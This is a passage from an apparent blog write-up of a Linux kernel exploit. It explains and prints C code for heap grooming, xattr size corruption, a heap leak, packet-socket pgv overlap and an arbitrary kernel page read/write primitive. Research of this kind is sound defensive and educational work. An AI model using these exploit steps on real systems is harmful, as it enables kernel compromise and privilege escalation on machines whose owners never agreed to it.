}</code></pre></div><p>The reclamation ring&#8217;s block 1 (16 KB) lands in one of these holes. Since the holes are periodic and the surrounding slots are occupied by simple_xattr objects, the page immediately after block 1 is very likely to contain a simple_xattr.</p><h4>Detecting the corruption</h4><p>The exploit scans all sprayed xattrs to find the corrupted one:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1b5edaab-2869-4f7c-a755-147f63bbfe2a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 0; i &lt; 2048; i++) {
    ssize_t ret = getxattr(filepath, name_i, value, 8192);
    if (ret &lt; 0 &amp;&amp; errno == ERANGE) {
        // Found it! size was changed from 8192 to 65536
        overflowed_xattr = i;
    }
}</code></pre></div><p>Normally, getxattr() with a buffer of 8,192 bytes succeeds because xattr-&gt;size == 8192. But for the corrupted xattr, xattr-&gt;size == 65536 &gt; 8192, so the kernel returns ERANGE (&#8220;buffer too small&#8221;). This is the signal.</p><h4>Building the heap read primitive</h4><p>Now the exploit has a <strong>heap read primitive</strong>: calling getxattr() with a 65,536-byte buffer on the corrupted xattr reads 65,536 bytes starting from the xattr&#8217;s value field. Since the xattr&#8217;s actual data is only 8,192 bytes but the kernel thinks size is 65,536, it copies 65,536 bytes &#8212; leaking ~57 KB of adjacent kernel heap memory.</p><p>The exploit uses this to find another simple_xattr in the leaked data, identifying it by pattern-matching the rb_node pointers (must be valid kernel addresses or NULL), the name pointer (must be a kernel address), the size field (must equal 8,192), and the value content (must match the known spray pattern like &#8220;pages_order2_groom_42&#8221;). This second xattr is called leaked_content_simple_xattr.</p><p>Next, the exploit <strong>removes all other xattrs</strong> &#8212; it loops through all 2,048 sprayed entries and calls removexattr() on every one except the corrupted xattr and the leaked one. This reduces the inode&#8217;s red-black tree from ~2,048 nodes to exactly <strong>two</strong>. In a two-node tree, one node is the root and the other is its child &#8212; so whichever of the leaked xattr&#8217;s rb_node pointers (parent, left, right) is non-NULL <strong>must</strong> reference the corrupted xattr, since there is no other node it could point to. With 2,048 nodes, the leaked xattr&#8217;s tree neighbors could be any of the other sprayed xattrs, and finding the corrupted one among them would be unreliable. The cleanup step eliminates this ambiguity.</p><p>Now the exploit calls getxattr() a second time on the corrupted xattr with a 65,536-byte buffer.
This works the same way as the first read: the kernel copies 65,536 bytes starting from the corrupted xattr&#8217;s value[] field, spilling past its actual 8,192 bytes of data into adjacent heap memory. The leaked xattr lives on a nearby order-2 page (the first read already identified which page offset it sits at), so its rb_node pointers appear at a known position within the 64 KB dump.</p><p>The key difference from the first read: the tree has been pruned to two nodes. The kernel reorganized the red-black tree as it removed the other ~2,046 xattrs, updating the remaining nodes&#8217; pointers along the way. In the resulting two-node tree, the leaked xattr&#8217;s rb_node.__rb_parent_color points to its parent (the corrupted xattr, if the corrupted xattr is the root) or its rb_left/rb_right points to the corrupted xattr (if the leaked xattr is the root). Either way, one of the three rb_node pointers contains the corrupted xattr&#8217;s kernel address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0f4f1cf1-1e24-4a67-9dcb-36cfeebc15aa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u64 parent = (u64)(__rb_parent(leaked_simple_xattr-&gt;rb_node.__rb_parent_color));
u64 left   = (u64)(leaked_simple_xattr-&gt;rb_node.rb_left);
u64 right  = (u64)(leaked_simple_xattr-&gt;rb_node.rb_right);
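// Exactly one of these is non-NULL after the prune; __rb_parent() above
// already stripped the color bit packed into __rb_parent_color's low bits.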
overflowed_simple_xattr_kernel_address = parent ? parent : (left ? left : right);</code></pre></div><p>From the corrupted xattr&#8217;s address and the known offset between the two xattrs in the leak data (each xattr occupies one order-2 page, so the offset is page_index &#215; 16384), the exploit calculates the kernel address of leaked_content_simple_xattr itself. These two addresses are the foundation for Stage 2.</p><h3>Stage 2: Heap Read/Write via pgv Overlap</h3><p>Stage 1 gave us two things: a heap read primitive (through the corrupted xattr with size = 65536) and the kernel addresses of two simple_xattr objects. But the heap read only works through getxattr() &#8212; a one-directional, read-only channel. To build a full read/write primitive, the exploit triggers the race a <strong>second time</strong>, this time overflowing into a pgv array to gain direct memory-mapped access to a simple_xattr in kernel memory.</p><h4>The target: pgv arrays instead of xattrs</h4><p>The key idea: if the overflow writes a <strong>kernel address</strong> into a pgv[N].buffer entry of some ring buffer, then mmap()&#8217;ing that ring buffer maps pgv[N].buffer into userspace. If pgv[N].buffer points to a simple_xattr object, the attacker gets a direct userspace pointer to live kernel data &#8212; readable and writable without any syscall.</p><p>The exploit creates 256 packet sockets and gives each one a TX ring buffer whose pgv array is large enough to be allocated from order-2 pages (16 KB). The size is chosen by setting the block count to MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;39b172b9-bc25-4586-a553-e935dd0dc08d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2  ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1)

// = (8192 / 8) + 1 = 1025</code></pre></div><p>Each ring buffer block is tracked by one struct pgv (a single 8-byte pointer), so 1,025 blocks means a pgv array of 1025 &#215; 8 = 8,200 bytes. This goes through kcalloc(1025, sizeof(struct pgv)) inside alloc_pg_vec(). The number 1,025 is deliberately one more than 1,024: with exactly 1,024 blocks, the array would be 8,192 bytes, which fits inside the kmalloc-8k slab bucket &#8212; and slab allocations don&#8217;t participate in page-level grooming. By requesting 1,025 blocks (8,200 bytes), the allocation exceeds the kmalloc-8k limit and falls through to the <strong>page allocator</strong>, which serves it from order-2 pages (16 KB). This is essential because the pgv arrays must land on order-2 pages to match the size of the holes created during heap grooming. Order-3 pages would also work but would waste twice as much memory.</p><h4>Heap grooming</h4><p>The grooming follows the same pattern as Stage 1, with reduced allocation counts (since memory is limited):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;365864f3-fb4d-460e-a74c-63929a92b023&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Step 1: Drain order-2 freelist &#8212; 256 &#215; 16 KB pages
Step 2: Drain order-3 freelist &#8212; 128 &#215; 32 KB pages (drain_pages_order3_1)
Step 3: More order-3 drain &#8212; 128 &#215; 32 KB pages (drain_pages_order3_2)
Step 4: Configure victim socket &#8212; RX ring allocates 2 &#215; 32 KB blocks (high addresses)
Step 5: Free drain_pages_order3_1 &#8212; returns 128 &#215; 32 KB pages
Step 6: Spray 256 pgv arrays &#8212; each 8,200 bytes, served from order-2 pages
         (buddy allocator splits the freed order-3 pages into order-2 halves)
Step 7: Free some pgv arrays to create holes for reclamation</code></pre></div><p>The hole creation is sparse &#8212; 6 holes every 16 entries starting at index 64:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d14064f0-139d-4bba-9738-894d9bea6393&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 64, free_count = 0;
     i &lt; 256 &amp;&amp; free_count &lt; 6;
     i += 16, free_count++) {
    free_pages(spray_pg_vec_packet_sockets[i]);
}</code></pre></div><p>The reclamation buffer (from the second race trigger) will land in one of these holes, with sprayed pgv arrays on both sides.</p><h4>Triggering the second race</h4><p>The exploit runs the same two-race sequence as Stage 1 &#8212; identical victim socket configuration, same mutex-barrier technique for race 1, same BPF filter + timer interrupt for race 2 &#8212; but with one difference: the packet data now contains leaked_content_simple_xattr_kernel_address (obtained from Stage 1) instead of XATTR_SIZE_MAX:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;aaccf404-9102-4d88-a850-b21e9bfe09fa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u8 packet_data[128] = {};
*(u64 *)(packet_data) = simple_xattr_kernel_address;</code></pre></div><p>The overflow arithmetic is identical: the 8-byte write lands at offset 24 past the reclamation block boundary, which is the 4th entry (index 3) of the adjacent pgv array &#8212; because 24 / sizeof(struct pgv) = 24 / 8 = 3.</p><p>So after the overflow:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d2c34262-3547-47df-ab85-99341b97a24f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">adjacent_pgv[3].buffer = leaked_content_simple_xattr_kernel_address;</code></pre></div><h4>Detecting the overflow</h4><p>The exploit iterates through all 256 sprayed ring buffers, mmap()s each one, and checks whether the data at block 3 (offset 3 &#215; PAGE_SIZE) looks like a simple_xattr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;b37099d9-7541-4e53-b6e5-6e436d2801c3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 0; i &lt; 256 &amp;&amp; !overflow_success; i++) {
    void *mem = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED,
                     spray_pg_vec_packet_sockets[i], 0);

    struct simple_xattr *simple_xattr = mem + 3 * PAGE_SIZE;
    if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) {
        overflowed_pg_vec_packet_socket = spray_pg_vec_packet_sockets[i];
        overflow_success = true;
    }
    munmap(mem, mmap_size);
}</code></pre></div><p>The recognition heuristic checks that the rb_node pointers are valid kernel addresses (using __rb_parent() to mask the color bit), that name is a valid kernel address, and that size == 8192.</p><p>When a match is found, the exploit saves this socket as overflowed_pg_vec_packet_socket and closes all the other sprayed sockets to reclaim memory.</p><h4>The resulting primitive</h4><p>From this point, the exploit can access the leaked_content_simple_xattr kernel object at will:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;57f7f1e4-1619-487e-b800-6072cf173872&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED,
                 overflowed_pg_vec_packet_socket, 0);
struct simple_xattr *manipulated_simple_xattr = mem + 3 * PAGE_SIZE;
// Now manipulated_simple_xattr points directly to live kernel memory</code></pre></div><p>This gives the exploit three capabilities through the &#8220;manipulated simple_xattr&#8221;:</p><ol><li><p><strong>Leak kernel addresses.</strong> The rb_node pointers in the simple_xattr point to other xattr objects in the same inode&#8217;s red-black tree. When the exploit creates a new xattr via setxattr(), the kernel inserts it into the tree and updates the existing nodes&#8217; child pointers. The exploit reads rb_node.rb_right or rb_node.rb_left to discover the new xattr&#8217;s kernel address. This is used repeatedly in Stage 3 to locate freshly allocated pages.</p></li></ol><ol start="2"><li><p><strong>Redirect the name pointer (page reclamation oracle).</strong> The exploit can overwrite manipulated_simple_xattr-&gt;name to point to any kernel address. This turns getxattr() into a boolean oracle for validating page reclamation. In Stage 3, the exploit repeatedly frees pages and tries to reclaim them with ring buffer blocks &#8212; but it needs to confirm each reclamation succeeded (some other kernel subsystem might have grabbed the page first). The technique works as follows: (1) reclaim the freed page via a ring buffer block and mmap it, (2) write a known string like &#8220;security.fake_simple_xattr_name&#8221; into the page, (3) overwrite manipulated_simple_xattr-&gt;name to point at that page&#8217;s kernel address, (4) call getxattr(filepath, &#8220;security.fake_simple_xattr_name&#8221;, ...). The kernel traverses the xattr tree, finds the manipulated xattr, dereferences its name pointer, and does strcmp() against the requested name. If the reclamation worked, the page contains the string the exploit wrote, strcmp() matches, and getxattr() succeeds &#8212; confirming the page is under the exploit&#8217;s control. If something else grabbed the page, strcmp() fails and the exploit knows to retry. 
The original name pointer is restored immediately after each check.</p></li></ol><ol start="3"><li><p><strong>Link fake objects into the xattr collection.</strong> The exploit modifies rb_node.rb_right or rb_node.rb_left to graft a fake simple_xattr node into the red-black tree (setting the fake node&#8217;s __rb_parent_color to point back to the manipulated xattr as its parent). When removexattr() is later called on the fake xattr, the kernel frees the page at the fake object&#8217;s address &#8212; giving the exploit a targeted page free primitive. This is the key mechanism for Stage 3&#8217;s double-overlapping ring buffer construction.</p></li></ol><h3>Stage 3: Arbitrary Page Read/Write via pgv Overlap</h3><p>Stage 2&#8217;s primitive lets the exploit read and write the fields of a single simple_xattr in kernel memory. That&#8217;s powerful, but limited &#8212; the exploit can only access one object at a fixed address. To read or write <em>any</em> kernel page, the exploit constructs a more general primitive: two ring buffers arranged so that one can overwrite the other&#8217;s pgv array entries, redirecting them to any page-aligned kernel address.</p><p>The construction boils down to three moves, spread over the five parts below: leaking two page addresses, building and linking a fake xattr that uses both pages (struct on one, name string on the other), then freeing the fake xattr to create the overlap.</p><h4>Part 1: Cleaning up</h4><p>First, the exploit destroys the overflowed_simple_xattr from Stage 1 (the one whose size was corrupted to 65,536). It&#8217;s no longer needed &#8212; the heap read primitive it provided has been superseded by Stage 2&#8217;s direct memory access.
After removal, the inode&#8217;s xattr collection contains only the leaked_content_simple_xattr, which is the object the exploit controls through the mmap&#8217;d ring buffer (the &#8220;manipulated simple_xattr&#8221;).</p><p>The exploit saves the original values of the manipulated xattr&#8217;s rb_node pointers and name so it can restore them later &#8212; the kernel&#8217;s xattr traversal code will crash if these pointers are left dangling.</p><h4>Part 2: Leaking page addresses via allocate-read-free</h4><p>The exploit needs two order-2 page addresses. It obtains each one through the same three-step pattern:</p><p><strong>Step 1: Allocate a temporary xattr.</strong> Call setxattr() on the tmpfs file to create a new simple_xattr with value_size = 8192 (order-2 pages). The kernel links it into the xattr collection, updating the manipulated xattr&#8217;s node pointers.</p><p><strong>Step 2: Read the address.</strong> Since the exploit has the manipulated simple_xattr mmap&#8217;d, it can immediately read the updated rb_node pointer to get the new xattr&#8217;s kernel address. The red-black tree may insert the new node as either a right or left child depending on the key comparison, so the exploit checks both:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9bb624f9-f5f7-4ee8-8f17-8c04c905429c&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">setxattr(filepath, "security.leak_for_name", value, KMALLOC_8K_SIZE, XATTR_CREATE);
if (manipulated_simple_xattr-&gt;rb_node.rb_right)
    fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr-&gt;rb_node.rb_right;
else
    fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr-&gt;rb_node.rb_left;</code></pre></div><p><strong>Step 3: Free it.</strong> Call removexattr() to free the temporary xattr. Its page goes back to the order-2 freelist.</p><p>The exploit repeats this pattern twice, obtaining two addresses:</p><ul><li><p>fake_simple_xattr_name_addr &#8212; will hold the fake xattr&#8217;s name string</p></li><li><p>fake_simple_xattr_addr &#8212; will hold the fake xattr structure itself</p></li></ul><h4>Part 3: Reclaiming the freed pages with ring buffer blocks</h4><p>After each address is leaked and the temporary xattr freed, the exploit immediately reclaims the freed page with a ring buffer block:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;678e8976-4c99-47f8-a6ee-1899d12b053a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Reclaim the freed page with a 1-block, order-2 ring buffer
alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE);</code></pre></div><p>Now the exploit can mmap() this ring buffer to read/write the page at fake_simple_xattr_name_addr. It writes the fake name string into it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;beb5fe71-f85f-4ef5-a140-2d5a71f7f7da&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = mmap(NULL, PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED,
                 fake_simple_xattr_name_packet_socket, 0);
strcpy(mem, "security.fake_simple_xattr_name");
munmap(mem, PAGES_ORDER2_SIZE);</code></pre></div><p>But how does the exploit know the reclamation succeeded? The freed page might have been reused by something else entirely. The exploit <strong>writes</strong> to the reclaimed page through the newly allocated ring buffer (via mmap), but <strong>reads</strong> through the leaked address (via getxattr). If the read returns what was written, the ring buffer must have landed on the same page the leaked address points to:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;c0789f3d-6e5e-4e69-8c0a-b8cd042db1fa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Now read through the leaked address: redirect the manipulated xattr's
// name pointer to fake_simple_xattr_name_addr (obtained from Part 2)
manipulated_simple_xattr-&gt;name = (char *)fake_simple_xattr_name_addr;

// Ask the kernel to look up this xattr by name &#8212; the kernel will follow
// the redirected name pointer and strcmp() it against the lookup key
ssize_t ret = getxattr(filepath, "security.fake_simple_xattr_name",
                       value, manipulated_simple_xattr-&gt;size);

// Restore original name pointer
manipulated_simple_xattr-&gt;name = (char *)original_name_pointer;

if (ret == manipulated_simple_xattr-&gt;size) {
    // Success! The kernel read from the leaked address and found the string
    // we wrote via the ring buffer. The two refer to the same physical page.
}</code></pre></div><p>If getxattr() succeeds, the ring buffer block and the leaked address map to the same page &#8212; the exploit now controls that page&#8217;s contents. If it fails, the exploit frees the ring buffer and retries.</p><p>The same process is repeated for fake_simple_xattr_addr, using a second packet socket (fake_simple_xattr_packet_socket).</p><h4>Part 4: Building and linking the fake xattr</h4><p>With both pages reclaimed and validated, the exploit writes a fake simple_xattr structure into the page at fake_simple_xattr_addr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;10ae6fad-9bd2-4eb5-81d8-e0a831e4d2d6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct simple_xattr *fake_simple_xattr = mem;
memset(mem, 0, PAGES_ORDER2_SIZE);  // zero the page so rb_left/rb_right start NULL (leaf node)
fake_simple_xattr-&gt;rb_node.__rb_parent_color = leaked_content_simple_xattr_kernel_address;
fake_simple_xattr-&gt;name = (void *)fake_simple_xattr_name_addr;
fake_simple_xattr-&gt;size = KMALLOC_8K_SIZE;</code></pre></div><p>The fake xattr&#8217;s __rb_parent_color is set to the kernel address of the manipulated xattr (the leaked_content_simple_xattr from Stage 1). This is because the red-black tree removal algorithm needs to find the parent node. The rb_right and rb_left fields are left as NULL (zeroed by memset), indicating this is a leaf node &#8212; simplifying the tree removal path. The name pointer points to fake_simple_xattr_name_addr (where the string &#8220;security.fake_simple_xattr_name&#8221; lives) and size is set to 8,192 bytes.</p><p>Now the exploit links this fake xattr into the inode&#8217;s red-black tree by modifying the manipulated xattr:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4f0a6c97-5c35-47b8-bc95-ce9480996878&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">if (is_right_node)
    manipulated_simple_xattr-&gt;rb_node.rb_right = (void *)fake_simple_xattr_addr;
else
    manipulated_simple_xattr-&gt;rb_node.rb_left = (void *)fake_simple_xattr_addr;</code></pre></div><p>The is_right_node variable tracks which child pointer was used when the temporary xattr was originally inserted (from Part 2&#8217;s second leak). The exploit reuses the same child slot, ensuring the tree structure remains consistent.</p><p>The kernel now considers this a real xattr in the collection.</p><h4>Part 5: Creating the pgv overlap</h4><p>Here is where the exploit reaches its goal. The exploit calls:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;73e76827-d874-435e-8b80-d237f6bb4ca3&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">removexattr(filepath, "security.fake_simple_xattr_name");</code></pre></div><p>The kernel finds the fake xattr, unlinks it from the red-black tree, and frees both allocations separately:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;919a9592-4cdc-43cd-8587-44e6a652f834&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">// Kernel's simple_xattr removal path:
kfree(xattr-&gt;name);   // frees Page A (fake_simple_xattr_name_addr)
kvfree(xattr);         // frees Page B (fake_simple_xattr_addr)</code></pre></div><p>Both pages return to the order-2 freelist. But the two ring buffers that previously reclaimed these pages still have their pgv[0].buffer pointing at them &#8212; the pointers were never updated:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;b370732e-0c64-458f-a6e0-4793edba9304&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">fake_simple_xattr_name_packet_socket &#8594; pgv[0].buffer = Page A (now freed)
fake_simple_xattr_packet_socket      &#8594; pgv[0].buffer = Page B (now freed)
Order-2 freelist: [Page A, Page B]</code></pre></div><p>These are <strong>dangling</strong> pointers &#8212; an intentional use-after-free. Immediately after the free, the exploit allocates a <strong>third</strong> ring buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;f3c910c3-37be-450c-854e-ae822ab0bff7&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">alloc_pages(overwritten_pg_vec_packet_socket,
            MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2,  // 1025 blocks
            PAGE_SIZE);</code></pre></div><p>This ring buffer has 1,025 blocks, so its pgv array is 1025 &#215; 8 = 8,200 bytes &#8212; allocated via kcalloc() in alloc_pg_vec(), rounded up to kmalloc-8k, and served from order-2 pages (the same page order as the just-freed fake xattr pages). With two order-2 pages just freed, the page allocator grabs one of them for the pgv array &#8212; say Page A:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;28705845-88f5-4358-a03f-f4ceb690a690&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">fake_simple_xattr_name_packet_socket &#8594; pgv[0].buffer = Page A &#8592; STILL POINTS HERE
fake_simple_xattr_packet_socket      &#8594; pgv[0].buffer = Page B (still freed)
overwritten_pg_vec_packet_socket     &#8594; pgv array lives on Page A</code></pre></div><p>Page A is now <strong>simultaneously</strong> block 0 of fake_simple_xattr_name_packet_socket (stale dangling pointer) and the pgv array of the third ring buffer (new allocation). When the exploit mmaps fake_simple_xattr_name_packet_socket, the kernel looks up pgv[0].buffer, finds Page A, and maps it into userspace &#8212; but Page A now contains the third ring buffer&#8217;s pgv entries. That&#8217;s the <strong>pgv overlap</strong>.</p><p>The exploit doesn&#8217;t know in advance which page the allocator will pick, so it mmaps both dangling ring buffers and checks which one contains data that looks like a pgv array (consecutive kernel pointers):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;242ef550-b048-43d0-ae2a-8dbc0011ebed&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem  = mmap(NULL, PAGES_ORDER2_SIZE, ..., fake_simple_xattr_name_packet_socket, 0);
void *mem1 = mmap(NULL, PAGES_ORDER2_SIZE, ..., fake_simple_xattr_packet_socket, 0);

if (mem != MAP_FAILED &amp;&amp; is_data_look_like_pgv(mem, 1025)) {
    packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket;
} else if (mem1 != MAP_FAILED &amp;&amp; is_data_look_like_pgv(mem1, 1025)) {
    packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket;
}

packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket;</code></pre></div><p>The is_data_look_like_pgv() function checks that each entry has a valid kernel address (upper 16 bits = 0xFFFF), which matches a pgv array filled with allocated block pointers. Whichever dangling ring buffer&#8217;s mmap reveals pgv entries is the one whose page was reclaimed &#8212; it becomes the &#8220;master.&#8221;</p><h4>The resulting primitive</h4><p>The exploit now has two ring buffers in a master-puppet relationship:</p><ul><li><p><strong>packet_socket_to_overwrite_pg_vec</strong> (the &#8220;master&#8221;): Its ring buffer block overlaps the puppet&#8217;s pgv array. Mmapping it exposes the raw pgv entries as writable memory.</p></li><li><p><strong>packet_socket_with_overwritten_pg_vec</strong> (the &#8220;puppet&#8221;): Its pgv entries can be arbitrarily modified by the master. Mmapping it maps whatever pages the (now-modified) pgv entries point to.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oYxW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oYxW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 424w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 848w, 
https://substackcdn.com/image/fetch/$s_!oYxW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png" width="1456" height="805" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:805,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:351944,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oYxW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 424w, 
https://substackcdn.com/image/fetch/$s_!oYxW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 848w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!oYxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F874b03b3-cc14-46b5-b324-ceb1fa4fcd6e_2520x1394.png 1456w" sizes="100vw" loading="lazy"></picture></div></a></figure></div><p>To read or write any page-aligned kernel address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;9bac391e-0f0a-410b-b689-d73d384673f6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *abr_page_read_write_primitive_mmap(
    struct abr_page_read_write_primitive *primitive,
    u64 page_aligned_addr)
{
    // Step 1: mmap the master &#8212; its block IS the puppet's pgv array
    void *mem = mmap(NULL, primitive-&gt;overwrite_pg_vec_mmap_size,
                     PROT_READ | PROT_WRITE, MAP_SHARED,
                     primitive-&gt;packet_socket_to_overwrite_pg_vec, 0);
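    // Defensive check (ours, not in the original exploit): bail out if
    // the kernel refused the mapping rather than dereference MAP_FAILED.
    if (mem == MAP_FAILED)
        return NULL;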
    struct pgv *pgv = mem;
    pgv[0].buffer = (char *)page_aligned_addr;   // redirect puppet's block 0
